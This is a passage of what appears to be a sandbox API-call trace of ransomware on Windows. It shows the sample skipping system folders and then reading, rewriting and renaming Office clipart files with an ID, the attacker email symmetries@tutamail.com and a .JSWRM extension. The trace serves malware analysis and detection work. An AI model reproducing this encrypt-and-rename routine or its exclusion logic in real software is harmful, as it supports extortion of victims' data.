lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0074.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0074.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0074.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0074.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.658] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0074.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.658] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x34cb, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD10890_.GIF", cAlternateFileName="")) returned 1 [0074.659] lstrcmpiW (lpString1="BD10890_.GIF", lpString2=".") returned 1 [0074.659] lstrcmpiW (lpString1="BD10890_.GIF", lpString2="..") returned 1 [0074.659] lstrcmpiW (lpString1="BD10890_.GIF", lpString2="...") returned 1 [0074.659] lstrcmpiW (lpString1="BD10890_.GIF", lpString2="windows") returned -1 [0074.659] lstrcmpiW (lpString1="BD10890_.GIF", lpString2="recovery") returned -1 [0074.659] lstrcmpiW (lpString1="BD10890_.GIF", lpString2="perflogs") returned -1 [0074.659] lstrcmpiW (lpString1="BD10890_.GIF", lpString2="documents and settings") returned -1 [0074.659] lstrcmpiW (lpString1="BD10890_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0074.659] lstrcmpiW (lpString1="BD10890_.GIF", lpString2="system volume information") returned -1 [0074.659] lstrcmpiW (lpString1="BD10890_.GIF", lpString2="msocache") returned -1 [0074.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0074.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD10890_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD10890_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD10890_.GIF", lpUsedDefaultChar=0x0) returned 12 [0074.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0074.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0074.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD10890_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD10890_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD10890_.GIF", lpUsedDefaultChar=0x0) returned 12 [0074.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0074.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.660] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13515) returned 1 [0074.660] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x34c0) returned 0x24c1d0 [0074.660] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x34c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x34c0, lpOverlapped=0x0) returned 1 [0074.662] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.662] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x34c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x34c0, lpOverlapped=0x0) returned 1 [0074.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.663] CloseHandle (hObject=0x460) returned 1 [0074.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0074.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0074.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0074.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0074.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0074.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.663] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0074.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.664] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4edd, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD10972_.GIF", cAlternateFileName="")) returned 1 [0074.664] lstrcmpiW (lpString1="BD10972_.GIF", lpString2=".") returned 1 [0074.664] lstrcmpiW (lpString1="BD10972_.GIF", lpString2="..") returned 1 [0074.664] lstrcmpiW (lpString1="BD10972_.GIF", lpString2="...") returned 1 [0074.664] lstrcmpiW (lpString1="BD10972_.GIF", lpString2="windows") returned -1 [0074.664] lstrcmpiW (lpString1="BD10972_.GIF", lpString2="recovery") returned -1 [0074.664] lstrcmpiW (lpString1="BD10972_.GIF", lpString2="perflogs") returned -1 [0074.664] lstrcmpiW (lpString1="BD10972_.GIF", lpString2="documents and settings") returned -1 [0074.664] lstrcmpiW (lpString1="BD10972_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0074.664] lstrcmpiW (lpString1="BD10972_.GIF", lpString2="system volume information") returned -1 [0074.664] lstrcmpiW (lpString1="BD10972_.GIF", lpString2="msocache") returned -1 [0074.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0074.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD10972_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD10972_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD10972_.GIF", lpUsedDefaultChar=0x0) returned 12 [0074.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0074.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0074.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD10972_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD10972_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD10972_.GIF", lpUsedDefaultChar=0x0) returned 12 [0074.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0074.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.665] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20189) returned 1 [0074.665] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4ed0) returned 0x24c1d0 [0074.665] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4ed0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x4ed0, lpOverlapped=0x0) returned 1 [0074.667] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.667] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4ed0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x4ed0, lpOverlapped=0x0) returned 1 [0074.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.668] CloseHandle (hObject=0x460) returned 1 [0074.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0074.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0074.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0074.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0074.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0074.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.668] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0074.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.669] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4fe6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD19563_.GIF", cAlternateFileName="")) returned 1 [0074.669] lstrcmpiW (lpString1="BD19563_.GIF", lpString2=".") returned 1 [0074.669] lstrcmpiW (lpString1="BD19563_.GIF", lpString2="..") returned 1 [0074.669] lstrcmpiW (lpString1="BD19563_.GIF", lpString2="...") returned 1 [0074.669] lstrcmpiW (lpString1="BD19563_.GIF", lpString2="windows") returned -1 [0074.669] lstrcmpiW (lpString1="BD19563_.GIF", lpString2="recovery") returned -1 [0074.669] lstrcmpiW (lpString1="BD19563_.GIF", lpString2="perflogs") returned -1 [0074.669] lstrcmpiW (lpString1="BD19563_.GIF", lpString2="documents and settings") returned -1 [0074.669] lstrcmpiW (lpString1="BD19563_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0074.669] lstrcmpiW (lpString1="BD19563_.GIF", lpString2="system volume information") returned -1 [0074.669] lstrcmpiW (lpString1="BD19563_.GIF", lpString2="msocache") returned -1 [0074.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0074.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19563_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19563_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD19563_.GIF", lpUsedDefaultChar=0x0) returned 12 [0074.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0074.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0074.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19563_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19563_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD19563_.GIF", lpUsedDefaultChar=0x0) returned 12 [0074.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0074.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.670] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20454) returned 1 [0074.670] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4fe0) returned 0x24c1d0 [0074.670] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4fe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x4fe0, lpOverlapped=0x0) returned 1 [0074.673] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.673] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4fe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x4fe0, lpOverlapped=0x0) returned 1 [0074.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.673] CloseHandle (hObject=0x460) returned 1 [0074.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0074.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0074.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0074.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0074.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0074.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.674] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0074.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.674] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d75, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD19582_.GIF", cAlternateFileName="")) returned 1 [0074.674] lstrcmpiW (lpString1="BD19582_.GIF", lpString2=".") returned 1 [0074.674] lstrcmpiW (lpString1="BD19582_.GIF", lpString2="..") returned 1 [0074.674] lstrcmpiW 